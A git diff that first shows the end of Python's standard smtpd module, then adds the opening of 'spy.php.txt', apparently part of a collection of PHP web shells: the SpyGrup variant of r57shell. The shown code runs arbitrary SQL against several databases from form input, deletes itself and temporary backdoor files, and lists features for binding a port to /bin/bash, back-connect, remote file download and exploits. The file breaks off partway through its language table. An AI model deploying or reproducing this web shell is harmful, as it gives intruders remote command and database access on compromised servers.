+                self.push(status)
+
+    # SMTP and ESMTP commands
+    def smtp_HELO(self, arg):
+        if not arg:
+            self.push('501 Syntax: HELO hostname')
+            return
+        if self.__greeting:
+            self.push('503 Duplicate HELO/EHLO')
+        else:
+            self.__greeting = arg
+            self.push('250 %s' % self.__fqdn)
+
+    def smtp_NOOP(self, arg):
+        if arg:
+            self.push('501 Syntax: NOOP')
+        else:
+            self.push('250 Ok')
+
+    def smtp_QUIT(self, arg):
+        # args is ignored
+        self.push('221 Bye')
+        self.close_when_done()
+
+    # factored
+    def __getaddr(self, keyword, arg):
+        address = None
+        keylen = len(keyword)
+        if arg[:keylen].upper() == keyword:
+            address = arg[keylen:].strip()
+            if not address:
+                pass
+            elif address[0] == '<' and address[-1] == '>' and address != '<>':
+                # Addresses can be in the form <person@dom.com> but watch out
+                # for null address, e.g. <>
+                address = address[1:-1]
+        return address
+
+    def smtp_MAIL(self, arg):
+        print >> DEBUGSTREAM, '===> MAIL', arg
+        address = self.__getaddr('FROM:', arg)
+        if not address:
+            self.push('501 Syntax: MAIL FROM:<address>')
+            return
+        if self.__mailfrom:
+            self.push('503 Error: nested MAIL command')
+            return
+        self.__mailfrom = address
+        print >> DEBUGSTREAM, 'sender:', self.__mailfrom
+        self.push('250 Ok')
+
+    def smtp_RCPT(self, arg):
+        print >> DEBUGSTREAM, '===> RCPT', arg
+        if not self.__mailfrom:
+            self.push('503 Error: need MAIL command')
+            return
+        address = self.__getaddr('TO:', arg)
+        if not address:
+            self.push('501 Syntax: RCPT TO: <address>')
+            return
+        self.__rcpttos.append(address)
+        print >> DEBUGSTREAM, 'recips:', self.__rcpttos
+        self.push('250 Ok')
+
+    def smtp_RSET(self, arg):
+        if arg:
+            self.push('501 Syntax: RSET')
+            return
+        # Resets the sender, recipients, and data, but not the greeting
+        self.__mailfrom = None
+        self.__rcpttos = []
+        self.__data = ''
+        self.__state = self.COMMAND
+        self.push('250 Ok')
+
+    def smtp_DATA(self, arg):
+        if not self.__rcpttos:
+            self.push('503 Error: need RCPT command')
+            return
+        if arg:
+            self.push('501 Syntax: DATA')
+            return
+        self.__state = self.DATA
+        self.set_terminator('\r\n.\r\n')
+        self.push('354 End data with <CR><LF>.<CR><LF>')
+
+
+
+class SMTPServer(asyncore.dispatcher):
+    def __init__(self, localaddr, remoteaddr):
+        self._localaddr = localaddr
+        self._remoteaddr = remoteaddr
+        asyncore.dispatcher.__init__(self)
+        self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
+        # try to re-use a server port if possible
+        self.set_reuse_addr()
+        self.bind(localaddr)
+        self.listen(5)
+        print >> DEBUGSTREAM, \
+              '%s started at %s\n\tLocal addr: %s\n\tRemote addr:%s' % (
+            self.__class__.__name__, time.ctime(time.time()),
+            localaddr, remoteaddr)
+
+    def handle_accept(self):
+        conn, addr = self.accept()
+        print >> DEBUGSTREAM, 'Incoming connection from %s' % repr(addr)
+        channel = SMTPChannel(self, conn, addr)
+
+    # API for "doing something useful with the message"
+    def process_message(self, peer, mailfrom, rcpttos, data):
+        """Override this abstract method to handle messages from the client.
+
+        peer is a tuple containing (ipaddr, port) of the client that made the
+        socket connection to our smtp port.
+
+        mailfrom is the raw address the client claims the message is coming
+        from.
+
+        rcpttos is a list of raw addresses the client wishes to deliver the
+        message to.
+
+        data is a string containing the entire full text of the message,
+        headers (if supplied) and all.  It has been `de-transparencied'
+        according to RFC 821, Section 4.5.2.  In other words, a line
+        containing a `.' followed by other text has had the leading dot
+        removed.
+
+        This function should return None, for a normal `250 Ok' response;
+        otherwise it returns the desired response string in RFC 821 format.
+
+        """
+        raise NotImplementedError
+
+
+
+class DebuggingServer(SMTPServer):
+    # Do something with the gathered message
+    def process_message(self, peer, mailfrom, rcpttos, data):
+        inheaders = 1
+        lines = data.split('\n')
+        print '---------- MESSAGE FOLLOWS ----------'
+        for line in lines:
+            # headers first
+            if inheaders and not line:
+                print 'X-Peer:', peer[0]
+                inheaders = 0
+            print line
+        print '------------ END MESSAGE ------------'
+
+
+
+class PureProxy(SMTPServer):
+    def process_message(self, peer, mailfrom, rcpttos, data):
+        lines = data.split('\n')
+        # Look for the last header
+        i = 0
+        for line in lines:
+            if not line:
+                break
+            i += 1
+        lines.insert(i, 'X-Peer: %s' % peer[0])
+        data = NEWLINE.join(lines)
+        refused = self._deliver(mailfrom, rcpttos, data)
+        # TBD: what to do with refused addresses?
+        print >> DEBUGSTREAM, 'we got some refusals:', refused
+
+    def _deliver(self, mailfrom, rcpttos, data):
+        import smtplib
+        refused = {}
+        try:
+            s = smtplib.SMTP()
+            s.connect(self._remoteaddr[0], self._remoteaddr[1])
+            try:
+                refused = s.sendmail(mailfrom, rcpttos, data)
+            finally:
+                s.quit()
+        except smtplib.SMTPRecipientsRefused, e:
+            print >> DEBUGSTREAM, 'got SMTPRecipientsRefused'
+            refused = e.recipients
+        except (socket.error, smtplib.SMTPException), e:
+            print >> DEBUGSTREAM, 'got', e.__class__
+            # All recipients were refused.  If the exception had an associated
+            # error code, use it.  Otherwise,fake it with a non-triggering
+            # exception code.
+            errcode = getattr(e, 'smtp_code', -1)
+            errmsg = getattr(e, 'smtp_error', 'ignore')
+            for r in rcpttos:
+                refused[r] = (errcode, errmsg)
+        return refused
+
+
+
+class MailmanProxy(PureProxy):
+    def process_message(self, peer, mailfrom, rcpttos, data):
+        from cStringIO import StringIO
+        from Mailman import Utils
+        from Mailman import Message
+        from Mailman import MailList
+        # If the message is to a Mailman mailing list, then we'll invoke the
+        # Mailman script directly, without going through the real smtpd.
+        # Otherwise we'll forward it to the local proxy for disposition.
+        listnames = []
+        for rcpt in rcpttos:
+            local = rcpt.lower().split('@')[0]
+            # We allow the following variations on the theme
+            #   listname
+            #   listname-admin
+            #   listname-owner
+            #   listname-request
+            #   listname-join
+            #   listname-leave
+            parts = local.split('-')
+            if len(parts) > 2:
+                continue
+            listname = parts[0]
+            if len(parts) == 2:
+                command = parts[1]
+            else:
+                command = ''
+            if not Utils.list_exists(listname) or command not in (
+                    '', 'admin', 'owner', 'request', 'join', 'leave'):
+                continue
+            listnames.append((rcpt, listname, command))
+        # Remove all list recipients from rcpttos and forward what we're not
+        # going to take care of ourselves.  Linear removal should be fine
+        # since we don't expect a large number of recipients.
+        for rcpt, listname, command in listnames:
+            rcpttos.remove(rcpt)
+        # If there's any non-list destined recipients left,
+        print >> DEBUGSTREAM, 'forwarding recips:', ' '.join(rcpttos)
+        if rcpttos:
+            refused = self._deliver(mailfrom, rcpttos, data)
+            # TBD: what to do with refused addresses?
+            print >> DEBUGSTREAM, 'we got refusals:', refused
+        # Now deliver directly to the list commands
+        mlists = {}
+        s = StringIO(data)
+        msg = Message.Message(s)
+        # These headers are required for the proper execution of Mailman.  All
+        # MTAs in existance seem to add these if the original message doesn't
+        # have them.
+        if not msg.getheader('from'):
+            msg['From'] = mailfrom
+        if not msg.getheader('date'):
+            msg['Date'] = time.ctime(time.time())
+        for rcpt, listname, command in listnames:
+            print >> DEBUGSTREAM, 'sending message to', rcpt
+            mlist = mlists.get(listname)
+            if not mlist:
+                mlist = MailList.MailList(listname, lock=0)
+                mlists[listname] = mlist
+            # dispatch on the type of command
+            if command == '':
+                # post
+                msg.Enqueue(mlist, tolist=1)
+            elif command == 'admin':
+                msg.Enqueue(mlist, toadmin=1)
+            elif command == 'owner':
+                msg.Enqueue(mlist, toowner=1)
+            elif command == 'request':
+                msg.Enqueue(mlist, torequest=1)
+            elif command in ('join', 'leave'):
+                # TBD: this is a hack!
+                if command == 'join':
+                    msg['Subject'] = 'subscribe'
+                else:
+                    msg['Subject'] = 'unsubscribe'
+                msg.Enqueue(mlist, torequest=1)
+
+
+
+class Options:
+    setuid = 1
+    classname = 'PureProxy'
+
+
+
+def parseargs():
+    global DEBUGSTREAM
+    try:
+        opts, args = getopt.getopt(
+            sys.argv[1:], 'nVhc:d',
+            ['class=', 'nosetuid', 'version', 'help', 'debug'])
+    except getopt.error, e:
+        usage(1, e)
+
+    options = Options()
+    for opt, arg in opts:
+        if opt in ('-h', '--help'):
+            usage(0)
+        elif opt in ('-V', '--version'):
+            print >> sys.stderr, __version__
+            sys.exit(0)
+        elif opt in ('-n', '--nosetuid'):
+            options.setuid = 0
+        elif opt in ('-c', '--class'):
+            options.classname = arg
+        elif opt in ('-d', '--debug'):
+            DEBUGSTREAM = sys.stderr
+
+    # parse the rest of the arguments
+    if len(args) < 1:
+        localspec = 'localhost:8025'
+        remotespec = 'localhost:25'
+    elif len(args) < 2:
+        localspec = args[0]
+        remotespec = 'localhost:25'
+    elif len(args) < 3:
+        localspec = args[0]
+        remotespec = args[1]
+    else:
+        usage(1, 'Invalid arguments: %s' % COMMASPACE.join(args))
+
+    # split into host/port pairs
+    i = localspec.find(':')
+    if i < 0:
+        usage(1, 'Bad local spec: %s' % localspec)
+    options.localhost = localspec[:i]
+    try:
+        options.localport = int(localspec[i+1:])
+    except ValueError:
+        usage(1, 'Bad local port: %s' % localspec)
+    i = remotespec.find(':')
+    if i < 0:
+        usage(1, 'Bad remote spec: %s' % remotespec)
+    options.remotehost = remotespec[:i]
+    try:
+        options.remoteport = int(remotespec[i+1:])
+    except ValueError:
+        usage(1, 'Bad remote port: %s' % remotespec)
+    return options
+
+
+
+if __name__ == '__main__':
+    options = parseargs()
+    # Become nobody
+    if options.setuid:
+        try:
+            import pwd
+        except ImportError:
+            print >> sys.stderr, \
+                  'Cannot import module "pwd"; try running with -n option.'
+            sys.exit(1)
+        nobody = pwd.getpwnam('nobody')[2]
+        try:
+            os.setuid(nobody)
+        except OSError, e:
+            if e.errno != errno.EPERM: raise
+            print >> sys.stderr, \
+                  'Cannot setuid "nobody"; try running with -n option.'
+            sys.exit(1)
+    classname = options.classname
+    if "." in classname:
+        lastdot = classname.rfind(".")
+        mod = __import__(classname[:lastdot], globals(), locals(), [""])
+        classname = classname[lastdot+1:]
+    else:
+        import __main__ as mod
+    class_ = getattr(mod, classname)
+    proxy = class_((options.localhost, options.localport),
+                   (options.remotehost, options.remoteport))
+    try:
+        asyncore.loop()
+    except KeyboardInterrupt:
+        pass 
diff --git a/138shell/S/spy.php.txt b/138shell/S/spy.php.txt
new file mode 100644
index 0000000..a5b232c
--- /dev/null
+++ b/138shell/S/spy.php.txt
@@ -0,0 +1,1889 @@
+<?php
+/******************************************************************************************************/
+/* 
+/* 
+/*    ssssssss  pppp  pppp    yyyyyy  yyyyyy    gggg  gggg  rrrr  rrrr  uuuu    uuuu  pppp  pppp  
+/*  ss            pppp    pp    yy      yy    gg    gggg      rrrr        uu      uu    pppp    pp
+/*   ssssss      pp      pp      yy  yy      gg      gg      rr          uu      uu    pp      pp
+/*         ss    pp      pp      yy  yy      gg      gg      rr          uu    uuuu    pp      pp
+/* ssssssss      pppppppp          yy          gggggggg    rrrrrrrr        uuuu  uuuu  pppppppp  
+/*               pp                yy                gg                                pp        
+/*             pppppp          yyyyyy          gggggg                                pppppp      
+/* 
+/*                    admin@spygrup.org[Kruis]   -   yaduris@spygrup.org[YaduriS]
+/*
+/*
+/*  r57shell.php - �крипт на пхп позвол��щий вам выполн�ть шелл команды  на �ервере через браузер
+/*  Вер�и�: 1.23
+/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
+/******************************************************************************************************/
+
+/* ~~~ �а�тройки  ~~~ */
+error_reporting(0);
+set_magic_quotes_runtime(0);
+@set_time_limit(0);
+@ini_set('max_execution_time',0);
+@ini_set('output_buffering',0);
+$safe_mode = @ini_get('safe_mode');
+$version = "SpyGrup.Org SpeciaL";
+if(version_compare(phpversion(), '4.1.0') == -1)
+ {
+ $_POST   = &$HTTP_POST_VARS;
+ $_GET    = &$HTTP_GET_VARS;
+ $_SERVER = &$HTTP_SERVER_VARS;
+ }
+if (@get_magic_quotes_gpc())
+ {
+ foreach ($_POST as $k=>$v)
+  {
+  $_POST[$k] = stripslashes($v);
+  }
+ foreach ($_SERVER as $k=>$v)
+  {
+  $_SERVER[$k] = stripslashes($v);
+  }
+ }
+
+/* ~~~ �утентификаци� ~~~ */
+
+// $auth = 1; - �утентификаци� вкл�чена
+// $auth = 0; - �утентификаци� выкл�чена
+$auth = 0;
+
+// Логин и пароль дл� до�тупа к �крипту
+// �Е З�БУДЬТЕ СМЕ�ИТЬ ПЕРЕД Р�ЗМЕЩЕ�ИЕМ �� СЕРВЕРЕ!!!
+$name='teufel'; // логин пользовател�
+$pass='spyms'; // пароль пользовател�
+
+if($auth == 1) {
+if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!==$name || $_SERVER['PHP_AUTH_PW']!==$pass)
+   {
+   header('WWW-Authenticate: Basic realm="shell"');
+   header('HTTP/1.0 401 Unauthorized');
+   exit("<b><a href=http://www.spygrup.org>www.spygrup.org</a> : Access Denied</b>");
+   }
+}
+$head = '<!-- Здрав�твуй  Ва�� -->
+<html>
+<head>
+<title>shell</title>
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
+
+<STYLE>
+tr {
+BORDER-RIGHT:  #aaaaaa 1px solid;
+BORDER-TOP:    #eeeeee 1px solid;
+BORDER-LEFT:   #eeeeee 1px solid;
+BORDER-BOTTOM: #aaaaaa 1px solid;
+}
+td {
+BORDER-RIGHT:  #aaaaaa 1px solid;
+BORDER-TOP:    #eeeeee 1px solid;
+BORDER-LEFT:   #eeeeee 1px solid;
+BORDER-BOTTOM: #aaaaaa 1px solid;
+}
+.table1 {
+BORDER-RIGHT:  #cccccc 0px;
+BORDER-TOP:    #cccccc 0px;
+BORDER-LEFT:   #cccccc 0px;
+BORDER-BOTTOM: #cccccc 0px;
+BACKGROUND-COLOR: #D4D0C8;
+}
+.td1 {
+BORDER-RIGHT:  #cccccc 0px;
+BORDER-TOP:    #cccccc 0px;
+BORDER-LEFT:   #cccccc 0px;
+BORDER-BOTTOM: #cccccc 0px;
+font: 7pt Verdana;
+}
+.tr1 {
+BORDER-RIGHT:  #cccccc 0px;
+BORDER-TOP:    #cccccc 0px;
+BORDER-LEFT:   #cccccc 0px;
+BORDER-BOTTOM: #cccccc 0px;
+}
+table {
+BORDER-RIGHT:  #eeeeee 1px outset;
+BORDER-TOP:    #eeeeee 1px outset;
+BORDER-LEFT:   #eeeeee 1px outset;
+BORDER-BOTTOM: #eeeeee 1px outset;
+BACKGROUND-COLOR: #D4D0C8;
+}
+input {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: 8pt Verdana;
+}
+select {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: 8pt Verdana;
+}
+submit {
+BORDER-RIGHT:  buttonhighlight 2px outset;
+BORDER-TOP:    buttonhighlight 2px outset;
+BORDER-LEFT:   buttonhighlight 2px outset;
+BORDER-BOTTOM: buttonhighlight 2px outset;
+BACKGROUND-COLOR: #e4e0d8;
+width: 30%;
+}
+textarea {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: Fixedsys bold;
+}
+BODY {
+margin-top: 1px;
+margin-right: 1px;
+margin-bottom: 1px;
+margin-left: 1px;
+}
+A:link {COLOR:red; TEXT-DECORATION: none}
+A:visited { COLOR:red; TEXT-DECORATION: none}
+A:active {COLOR:red; TEXT-DECORATION: none}
+A:hover {color:blue;TEXT-DECORATION: none}
+</STYLE>';
+if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
+if ($_POST['cmd']=="db_query")
+ {
+  echo $head;
+  switch($_POST['db'])
+  {
+  case 'MySQL':
+  if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; }
+  $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+  if($db)
+   {
+   	if(!empty($_POST['mysql_db'])) { @mysql_select_db($_POST['mysql_db'],$db); }
+    $querys = @explode(';',$_POST['db_query']);
+    foreach($querys as $num=>$query)
+     {
+      if(strlen($query)>5){
+      echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>";
+      $res = @mysql_query($query,$db);
+      $error = @mysql_error($db);
+      if($error) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; }
+      else {
+      if (@mysql_num_rows($res) > 0)
+       {
+       $sql2 = $sql = $keys = $values = '';
+       while (($row = @mysql_fetch_assoc($res)))
+        {
+        $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", @array_keys($row));
+        $values = @array_values($row);
+        foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);}
+        $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$values);
+        $sql2 .= "<tr><td><font face=Verdana size=-2>&nbsp;".$values."&nbsp;</font></td></tr>";
+        }
+       echo "<table width=100%>";
+       $sql  = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
+       $sql .= $sql2;
+       echo $sql;
+       echo "</table><br>";
+       }
+      else { if(($rows = @mysql_affected_rows($db))>=0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } }
+      }
+      @mysql_free_result($res);
+      }
+     }
+   	@mysql_close($db);
+   }
+  else echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to MySQL server</b></font></div>";
+  break;
+  case 'MSSQL':
+  if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; }
+  $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+  if($db)
+   {
+   	if(!empty($_POST['mysql_db'])) { @mssql_select_db($_POST['mysql_db'],$db); }
+    $querys = @explode(';',$_POST['db_query']);
+    foreach($querys as $num=>$query)
+     {
+      if(strlen($query)>5){
+      echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>";
+      $res = @mssql_query($query,$db);
+      if (@mssql_num_rows($res) > 0)
+       {
+       $sql2 = $sql = $keys = $values = '';
+       while (($row = @mssql_fetch_assoc($res)))
+        {
+        $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", @array_keys($row));
+        $values = @array_values($row);
+        foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);}
+        $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$values);
+        $sql2 .= "<tr><td><font face=Verdana size=-2>&nbsp;".$values."&nbsp;</font></td></tr>";
+        }
+       echo "<table width=100%>";
+       $sql  = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
+       $sql .= $sql2;
+       echo $sql;
+       echo "</table><br>";
+       }
+      /* else { if(($rows = @mssql_affected_rows($db)) > 0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } else { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; }} */
+      @mssql_free_result($res);
+      }
+     }
+   	@mssql_close($db);
+   }
+  else echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to MSSQL server</b></font></div>";
+  break;
+  case 'PostgreSQL':
+  if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; }
+  $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'";
+  $db = @pg_connect($str);
+  if($db)
+   {
+    $querys = @explode(';',$_POST['db_query']);
+    foreach($querys as $num=>$query)
+     {
+      if(strlen($query)>5){
+      echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>";
+      $res = @pg_query($db,$query);
+      $error = @pg_errormessage($db);
+      if($error) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; }
+      else {
+      if (@pg_num_rows($res) > 0)
+       {
+       $sql2 = $sql = $keys = $values = '';
+       while (($row = @pg_fetch_assoc($res)))
+        {
+        $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", @array_keys($row));
+        $values = @array_values($row);
+        foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);}
+        $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$values);
+        $sql2 .= "<tr><td><font face=Verdana size=-2>&nbsp;".$values."&nbsp;</font></td></tr>";
+        }
+       echo "<table width=100%>";
+       $sql  = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
+       $sql .= $sql2;
+       echo $sql;
+       echo "</table><br>";
+       }
+      else { if(($rows = @pg_affected_rows($res))>=0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } }
+      }
+      @pg_free_result($res);
+      }
+     }
+   	@pg_close($db);
+   }
+  else echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to PostgreSQL server</b></font></div>";
+  break;
+  case 'Oracle':
+  $db = @ocilogon($_POST['mysql_l'], $_POST['mysql_p'], $_POST['mysql_db']);
+  if(($error = @ocierror())) { echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to Oracle server.<br>".$error['message']."</b></font></div>"; }
+  else
+   {
+   $querys = @explode(';',$_POST['db_query']);
+   foreach($querys as $num=>$query)
+    {
+    if(strlen($query)>5) {
+    echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>";
+    $stat = @ociparse($db, $query);
+    @ociexecute($stat);
+    if(($error = @ocierror())) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error['message']."</b></font></td></tr></table><br>"; }
+    else
+     {
+     $rowcount = @ocirowcount($stat);
+     if($rowcount != 0) {echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rowcount."</b></font></td></tr></table><br>";}
+     else {
+     echo "<table width=100%><tr>";
+     for ($j = 1; $j <= @ocinumcols($stat); $j++) { echo "<td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".htmlspecialchars(@ocicolumnname($stat, $j))."&nbsp;</b></font></td>"; }
+     echo "</tr>";
+     while(ocifetch($stat))
+      {
+      echo "<tr>";
+      for ($j = 1; $j <= @ocinumcols($stat); $j++) { echo "<td><font face=Verdana size=-2>&nbsp;".htmlspecialchars(@ociresult($stat, $j))."&nbsp;</font></td>"; }
+      echo "</tr>";
+      }
+     echo "</table><br>";
+     }
+     @ocifreestatement($stat);
+     }
+    }
+    }
+   @ocilogoff($db);
+   }
+  break;
+  }
+ echo "<form name=form method=POST>";
+ echo in('hidden','db',0,$_POST['db']);
+ echo in('hidden','db_port',0,$_POST['db_port']);
+ echo in('hidden','mysql_l',0,$_POST['mysql_l']);
+ echo in('hidden','mysql_p',0,$_POST['mysql_p']);
+ echo in('hidden','mysql_db',0,$_POST['mysql_db']);
+ echo in('hidden','cmd',0,'db_query');
+ echo "<div align=center><textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>";
+ echo "</form>";
+ echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
+ }
+if(isset($_GET['delete']))
+ {
+   @unlink(@substr(@strrchr($_SERVER['PHP_SELF'],"/"),1));
+ }
+if(isset($_GET['tmp']))
+ {
+   @unlink("/tmp/bdpl");
+   @unlink("/tmp/back");
+   @unlink("/tmp/bd");
+   @unlink("/tmp/bd.c");
+   @unlink("/tmp/dp");
+   @unlink("/tmp/dpc");
+   @unlink("/tmp/dpc.c");
+ }
+if(isset($_GET['phpini']))
+{
+echo $head;
+function U_value($value)
+ {
+ if ($value == '') return '<i>no value</i>';
+ if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
+ if ($value === null) return 'NULL';
+ if (@is_object($value)) $value = (array) $value;
+ if (@is_array($value))
+ {
+ @ob_start();
+ print_r($value);
+ $value = @ob_get_contents();
+ @ob_end_clean();
+ }
+ return U_wordwrap((string) $value);
+ }
+function U_wordwrap($str)
+ {
+ $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);
+ return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str);
+ }
+if (@function_exists('ini_get_all'))
+ {
+ $r = '';
+ echo '<table width=100%>', '<tr><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>';
+ foreach (@ini_get_all() as $key=>$value)
+  {
+  $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>';
+  }
+ echo $r;
+ echo '</table>';
+ }
+echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+die();
+}
+if(isset($_GET['cpu']))
+ {
+   echo $head;
+   echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>';
+   $cpuf = @file("cpuinfo");
+   if($cpuf)
+    {
+      $c = @sizeof($cpuf);
+      for($i=0;$i<$c;$i++)
+        {
+          $info = @explode(":",$cpuf[$i]);
+          if($info[1]==""){ $info[1]="---"; }
+          $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
+        }
+      echo $r;
+    }
+   else
+    {
+      echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
+    }
+   echo '</table>';
+   echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+   die();
+ }
+if(isset($_GET['mem']))
+ {
+   echo $head;
+   echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>';
+   $memf = @file("meminfo");
+   if($memf)
+    {
+      $c = sizeof($memf);
+      for($i=0;$i<$c;$i++)
+        {
+          $info = explode(":",$memf[$i]);
+          if($info[1]==""){ $info[1]="---"; }
+          $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
+        }
+      echo $r;
+    }
+   else
+    {
+      echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
+    }
+   echo '</table>';
+   echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+   die();
+ }
+/*
+Выбор �зыка
+$language='eng' - ру��кий
+$language='ru' - англий�кий
+*/
+$language='eng';
+$lang=array(
+'ru_text1' =>'Выполненна� команда',
+'ru_text2' =>'Выполнение команд на �ервере',
+'ru_text3' =>'Выполнить команду',
+'ru_text4' =>'Рабоча� директори�',
+'ru_text5' =>'Загрузка файлов на �ервер',
+'ru_text6' =>'Локальный файл',
+'ru_text7' =>'�лиа�ы',
+'ru_text8' =>'Выберите алиа�',
+'ru_butt1' =>'Выполнить',
+'ru_butt2' =>'Загрузить',
+'ru_text9' =>'�ткрытие порта и прив�зка его к /bin/bash',
+'ru_text10'=>'�ткрыть порт',
+'ru_text11'=>'Пароль дл� до�тупа',
+'ru_butt3' =>'�ткрыть',
+'ru_text12'=>'back-connect',
+'ru_text13'=>'IP-адре�',
+'ru_text14'=>'Порт',
+'ru_butt4' =>'Выполнить',
+'ru_text15'=>'Загрузка файлов � удаленного �ервера',
+'ru_text16'=>'И�пользовать',
+'ru_text17'=>'Удаленный файл',
+'ru_text18'=>'Локальный файл',
+'ru_text19'=>'Exploits',
+'ru_text20'=>'И�пользовать',
+'ru_text21'=>'�овое им�',
+'ru_text22'=>'datapipe',
+'ru_text23'=>'Локальный порт',
+'ru_text24'=>'Удаленный хо�т',
+'ru_text25'=>'Удаленный порт',
+'ru_text26'=>'И�пользовать',
+'ru_butt5' =>'Запу�тить',
+'ru_text28'=>'Работа в safe_mode',
+'ru_text29'=>'До�туп запрещен',
+'ru_butt6' =>'Сменить',
